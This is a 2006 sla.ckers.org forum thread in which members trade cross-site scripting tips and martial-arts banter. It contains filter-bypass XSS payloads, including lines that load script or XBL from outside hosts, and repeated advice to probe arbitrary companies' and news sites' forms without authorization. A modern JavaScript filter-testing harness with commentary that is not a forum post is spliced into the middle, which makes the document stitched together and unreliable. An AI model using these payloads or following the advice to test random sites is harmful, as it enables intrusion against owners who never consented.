Sla.ckers.org (sla.ckers.org is ha.ckers sla.cking)
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 11:57AM

Jakob Nielsen has a short article on online communities that’s worth a read.

http://www.useit.com/alertbox/participation_inequality.html

This stat seems to jibe pretty well with what I see in the logs too. About 1/10 are actually registered users, and of those registered users only 1/10 are consistent posters. It's easier to measure on the blogs - I have somewhere north of 500 readers (hard to estimate precisely) and maybe 20 people who comment regularly (making it a 95-4-1% distribution). Interesting stats for anyone working with blogs/forums.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 11:58AM

Actually, the side effect for this board in particular is that with more dynamic pages out there for people to post and contribute to, the more CSRF and XSS will prevail, as their major recommendation is to build more dynamic sites with lower hurdles to adoption and higher customization benefits.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Lurkers - we know who you are
Posted by: Kyran
Date: October 11, 2006 12:08PM

Interesting. It's a shame lurkers isn't spelled with a c also.
lur.ckers.org

- Kyran

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 01:07PM

Hahah, indeed! lur-minus-the-c.ckers.org

- RSnake
Gotta love it. http://ha.ckers.org

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 11, 2006 03:25PM

I'm guilty of lurking... with gusto!!...

Actually, I've just got so much to read and learn I figured I would get a *small* handle on it before I flood ya with questions.... haha

I've been reading the cheatsheet and testing on my own sites. I just finished up a cookie stealer from WhiteAcid's tuts yesterday.... It works, to a point; I can't get any valid cookies to go through though.... (I had one from myself and I can't seem to get it to reproduce again)

much, MUCH more reading to do...

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 04:01PM

pheusion, hahah, I feel your pain as we've all been there at some point, but without "newbish" questions there's really no way to know how to get you all up to speed. So although it might be a big step back for some of the folks, it doesn't hurt to have the questions asked as it helps document the thinking that all of us have to go through at some point to get to where we are now. So feel free to ask any/all questions you want - if nothing else you might get a "STFU RTFM @ URL:..." (although I haven't seen anyone do that yet). But even still it may save you some time looking for the answer yourself.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 06:44AM

As always Snake, you remind me of why I love this site so much.

The newb questions will come soon, everyday I am learning something new and researching, which is honestly, 99% of the fun...

Loving the study, makes me feel smart haha

Side note:
Trying to find this post about someone saying they want to kick some A$$.... What's the background on that? I've got an MMA / BJJ school I help run if ever in need.. Don't mess with Snake or ID (or acid or Maluc or......) lol



Edited 1 time(s). Last edit at 10/12/2006 06:59AM by pheusion.

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 07:12AM

Ok, here's a question...

I'm not a coder. I don't have a difficult time keeping up with simple code, but obviously at the moment I do not have the knowledge to code out an "XSS sandbox" type site myself.... Think Perl and *nix, that's pretty much my level of coding knowledge... simple admin type stuff (simple scripts to do this or that).

With that being the case, I am sure the right answer is to go and learn how to code out my own site... RTFM right hahaha

In the in-between, I have been testing against some of my own servers, which consist of Joomla (Mixed Martial Arts site). I know a lot of issues are found in Joomla, mainly due to developers creating modules that incorporate into the main system and not working with the original developers. I was wondering if there is something that will provide me with a full testing environment that I can load onto my own domain.

Most of the time I am researching and teaching myself from work (12 hour days suck), so I can't just go running around the net and testing against others' sites. Even with a proxy I just don't want to use the company network for my testing and risk the possibility of someone getting pissed....

Would it be as simple as installing a known vuln version of, like, phpBB or similar? Anything you can recommend?

I have been playing with a lot of the frameworks, but it's just not the same.

Can ya say long winded? Sorry...

Re: Lurkers - we know who you are
Posted by: maluc
Date: October 12, 2006 08:26AM

lol, thanks for the offer of thug support.. ^^
and i assume he's referring to some dude named Tyson .. scroll to bottom of http://ha.ckers.org/wallofshame.html

And installing some web app just to locate XSS is a lot of work for little gain. You'll learn a lot more by just trying to find some on different random websites. Now, if you want to test writing actual exploits, like cookie stealer, form stealer, key logger, SQL injection, file inclusion, etc.. then yes. You should definitely test exploiting locally - at least those last two. I used Invision Power Board v1.3 myself, which worked well. It has several holes of each flavor, and helped me learn SQL's syntax much better.

For reflected XSS though, I'd just stick to online sites. And once you get comfortable with both HTML and JavaScript injection (JavaScript is slightly tougher to learn), then skim through that Full Disclosure thread and look at the ones people say "This is an interesting example" for.

-maluc

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 08:55AM

Thanks for the info Maluc...

I think maybe that was my issue, finding the sites initially... Doing a Google search for various patterns or login file types seemed like it was producing results, but I became wary of actually trying to inject based off of the cheatsheet.... It seemed like those would be the hardest hit (as every newb such as myself is following the same learning pattern, I would imagine those sites are getting tired of seeing their logs...). I thought about going to, like, the 30th result page and starting from there, but I still had some second thoughts about doing it from here (work).... Unfortunately I am here just about every waking moment (hence the need to learn more and move on).

I suppose if I am proxied and I am not altering anything I am not doing anything wrong really, and I could say it is related to work as we are implementing a new web order system....

IPB for the SQL injections should be good though. I have been using the hacme, mightyseek and other types of sites... The IPB will allow me to test and use it on my own without worry... Sweet...

Thanks again, really appreciate it...

(Ahh, I see the A$$ kickin statement... funny stuff...)



Edited 1 time(s). Last edit at 10/12/2006 08:59AM by pheusion.

Re: Lurkers - we know who you are
Posted by: maluc
Date: October 12, 2006 09:37AM

heh, there's no need to Google at all.. just pick a company. any company. chances are (around 90-95% of large companies) it's gonna have a hole somewhere.

First places I check: search box, Contact Us form, feedback form, Forgot Password form, newsletter signup, new account registration .. then all the extra variables in the links .. then anything and everything.

But ya, I never use a Google search to find vulnerabilities (except redirects) .. but I do use it since I'm running out of sites to check. Pick an industry like "phone companies" and go down the list.

And yes, you shouldn't need the cheatsheet for most of them, except when there's unusual filters.

Most common cheats I use:

String.fromCharCode                                  .. when ' -> \' and " -> \"
style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert())"
                                                     .. when no > or < allowed
<script src=http://blah/xss.js?                      .. when it deletes from < to >
<script/xss>                                         .. for a <script> filter
<body onload=alert()>                                .. for a <scri* filter

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 09:56AM

Wow, Maluc I believe I owe you some beers =)

It's this type of info right here, real world type of examples that makes this site so valuable. So many other sites are willing to tell certain things, but not like you guys...

I would have been using Google and going through results for ages. Picking an industry is an EXCELLENT suggestion and something I can set a goal with.

I can't thank ya enough...

Re: Lurkers - we know who you are
Posted by: maluc
Date: October 12, 2006 10:09AM

lol, I'm not much of a beer man (too diluted, with piss).. but I'm not one to turn down good liquor.

and yeah, so far I've yet to see much noob bashing/ignoring here.. which is nice, but I can't guarantee that'll last.

by the way, don't start with telephone companies.. a few of those were pretty tough. News sites on the other hand, I've yet to see one that had even decent prevention. They might be the best choice, or just sites you frequent.

Note: on news aggregators like Slashdot/Digg I didn't find any.

-maluc

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 10:23AM

Not a fan of beer myself (bad for training), so I'm in the same boat... Good liquor...

Honestly, I was thinking the UFC (MMA / NHB / BJJ) arena: a lot of Mambo / Joomla sites, usually set up with little tech knowledge, it's an arena I am active in, etc...

This place doesn't seem like bashing would become prevalent; all of you with knowledge on the subject are more than willing to give suggestions, and don't respond with RTFM or RTFA....

I mean, if people come in and say "What is XSS and can you show me how to hack my friend's MySpace account", well, bash away... But it seems that if someone posts an intelligent, valid question then it returns an intelligent, valid response.

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 10:47AM

I'm sorry I didn't get a chance to respond during this conversation, but to add my two cents... maluc is actually very correct. I VERY rarely use my own Cheat Sheet for actual testing unless I know for a fact that nothing normal will work and I need to test some of the more obscure vectors with bizarre syntax. That probably happens about 1/100 times or less. The most common ones are the ones Maluc listed above + some of the flash + expect stuff. To do that testing just change out victim.com with the site you want to test (and try this in IE): http://ha.ckers.org/expect.swf?http://www.victim.com/

But anyway, while I'm not going to tell anyone to STFU/RTFM myself, I can definitely see it happening. I figure we should all lead by example and not let it degrade into that. Any questions are fair. But one of the ways I learned was to intentionally build a flawed filtering mechanism and then fix it and then try to break it again and then fix that flaw and so on. I was going to release it but of course it has lots of XSS holes in it and the code sucked so it wasn't something I really wanted to release. But it did help my understanding a lot to set up my own internal webserver and hack it for dozens of hours a week for a few years straight.

And lastly, you definitely fit in the demographic by your interest in MMA. I was actually asked by a splinter group of the Lion's Den to join them (about 6-7 years ago when they were still on top), but I decided I liked the way my face looked, and I had stopped taking Ju Jitsu and Karate a few years earlier so I was a tad out of practice. For your martial arts fans, I only have one video from around that time - several years after I had stopped (this was probably 5-6 years ago that the video was taken): http://www.shocking.com/~rsnake/chucks.wmv -sorry for the funky format, but it does play under media player if you save it.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Lurkers - we know who you are
Posted by: Kyran
Date: October 12, 2006 11:19AM

Ah yes. I definitely agree we should try to not let this forum degrade into many other tech forums. RTFM should never be a response. Perhaps part of one ("You should try doing this, btw also RTFM") but not the entire response.

I only use the cheat sheet as a quick encoding tool, since I am too lazy to make an Opera widget for it. Recently, I've only used its vectors once (the Nexopia one. I had a brain fart and forgot the img src vector. http://www.nexopia.com/wiki/Advertise%3CIMG%20SRC=javascript:alert('xss')%3E ). I'm rather glad. I used to be totally dependent on it. Now I do all testing by hand.

I suppose you were right about people in security often taking martial arts rsnake. :D

- Kyran

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 11:26AM

NICE Snake... Always good to meet a fellow Tech / BJJ'er....

As you stated, the best way to learn is to build it and break it... Getting httpd running isn't an issue for me... I just need to read up on building web apps and go the route you suggested...

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 11:50AM

hahah... I was probably in the flyweight class (maybe 150lbs in that movie). It was fun, but I actually was beating my teacher about 50% of the time so I dropped out of it. I'm a lover not a fighter. At least that's what I like to tell the ladies.

Yah, don't focus too much on making a robust real application. A form submission box, a filter and a response are all you need to start testing. I did all my stuff in Perl (still do for the most part) because it's super fast to prototype with and I like the control it has over headers better than PHP (at least how it works). But it's probably better to use PHP long term since it has easily taken over as the dominant open source web application development programming language.

- RSnake
Gotta love it. http://ha.ckers.org

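The "form box, filter, response" loop rsnake describes, and the filter-bypass list maluc posted earlier in the thread, fit together as one small exercise. The code below is an added example and is not code from the thread or from ha.ckers.org: it stands up one naive blacklist filter per trick in maluc's list, checks that the matching payload gets through, then replaces the blacklists with context-specific output encoding and checks that nothing gets through any more. The filter names, the two sinks (an HTML body/attribute sink and a JS string-literal sink), the `alert(1)` bodies, and the leading-backslash variant of the quote-escape bypass are my own constructions for illustration.

```javascript
// Added example (not from the thread): rsnake's "build a flawed filter, break
// it, fix it" loop, driven by the bypass tricks maluc listed. The filter names,
// the two sinks, and the exact payload strings are my own constructions.

// Round 1: one naive blacklist per trick in maluc's list.
const naiveFilters = {
  stripScriptTag:      (s) => s.replace(/<script>/gi, ""),     // "<script> filter"
  stripScriPrefix:     (s) => s.replace(/<scri[^>]*>/gi, ""),  // "<scri* filter"
  stripAngleBracketed: (s) => s.replace(/<[^>]*>/g, ""),       // "deletes from < to >"
  stripAngles:         (s) => s.replace(/[<>]/g, ""),          // "no > or < allowed"
  escapeQuotes:        (s) => s.replace(/(['"])/g, "\\$1"),    // ' -> \' and " -> \"
};

// Payloads, each paired with the filter it is meant to defeat. The last one
// adds a leading backslash (a common trick, not in maluc's post): the quote
// escaper turns \' into \\', which re-activates the quote, and
// String.fromCharCode supplies the string "XSS" without any quotes to escape.
const payloads = [
  { breaks: "stripScriptTag",      p: "<script/xss>alert(1)</script>" },
  { breaks: "stripScriPrefix",     p: "<body onload=alert(1)>" },
  { breaks: "stripAngleBracketed", p: "<script src=http://blah/xss.js?" },
  { breaks: "stripAngles",
    p: "style=\"-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss');xx:expression(alert())\"" },
  { breaks: "escapeQuotes",        p: "\\';alert(String.fromCharCode(88,83,83));//" },
];

// Sink for the quote-escaping case: the app drops input into a JS string
// literal. We compile it with Function() and hand it a fake alert() so the
// check is "did alert run", not "does the string look suspicious".
function jsSinkFires(filtered) {
  const code = "var s='" + filtered + "';";
  const hits = [];
  try {
    new Function("alert", code)((x) => hits.push(String(x)));
  } catch (e) {
    // a SyntaxError means the payload broke the script without executing
  }
  return hits.length > 0;
}

// For the HTML sinks a blacklist has failed if the payload passes through
// untouched; for the JS sink, if the fake alert fires.
function defeats(filterName, payload) {
  const out = naiveFilters[filterName](payload);
  return filterName === "escapeQuotes" ? jsSinkFires(out) : out === payload;
}

// Round 2: the fix. Replace the blacklists with context-specific output
// encoding: entity-encode for HTML body/attribute context, \uXXXX-escape
// everything non-alphanumeric for a JS string literal.
const htmlEntities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const encodeForHtml = (s) => s.replace(/[&<>"']/g, (c) => htmlEntities[c]);
const encodeForJsString = (s) =>
  s.replace(/[^A-Za-z0-9]/g, (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));

function neutralised(filterName, payload) {
  if (filterName === "escapeQuotes") return !jsSinkFires(encodeForJsString(payload));
  // after entity encoding nothing can open a tag or close a quoted attribute
  return !/[<>"']/.test(encodeForHtml(payload));
}

// Run both rounds; returns one boolean per payload for each round.
function audit() {
  return {
    round1Bypassed:    payloads.map(({ breaks, p }) => defeats(breaks, p)),
    round2Neutralised: payloads.map(({ breaks, p }) => neutralised(breaks, p)),
  };
}

console.log(audit());
```

Two caveats a practitioner would want. First, the `-moz-binding` and `expression()` vectors in that list are period pieces: current Firefox no longer loads remote XBL and current IE/Edge no longer evaluate CSS `expression()`, so that payload surviving the `stripAngles` filter only shows that the blacklist is the wrong tool, not that it fires in a 2024 browser; `<script/xss>`, `<body onload=...>` and the unterminated `<script src=... ?` trick do still parse. Second, the round-2 encoders are only correct for the sink they are named for: entity encoding does nothing for input that lands inside a `<script>` block, and `\u` escaping does nothing for input that lands in an HTML attribute, which is exactly why the loop is worth running against each injection context separately.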
Re: Lurkers - we know who you are
Posted by: id
Date: October 12, 2006 12:07PM

Will you freakin n00bs talk about this in the right forum?

-id

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 12:15PM

Is there a forum for mixed martial arts/intro to XSS?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 12:41PM

Lol...

Sorry

Re: Lurkers - we know who you are
Posted by: id
Date: October 12, 2006 01:09PM

Should I add the forum:

My ekarate > your xssfu
Post here if you want to kick someone's ass who made you look like an ass via XSS!

-id

Re: Lurkers - we know who you are
Posted by: Kyran
Date: October 12, 2006 01:18PM

Hah. xssfu. I love it.

- Kyran

Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 01:45PM

That's tricky because generally I make myself look like an ass via XSS (reflected XSS). Does that make me an XSS-foo or does that give me XSS-fu?

- RSnake
Gotta love it. http://ha.ckers.org
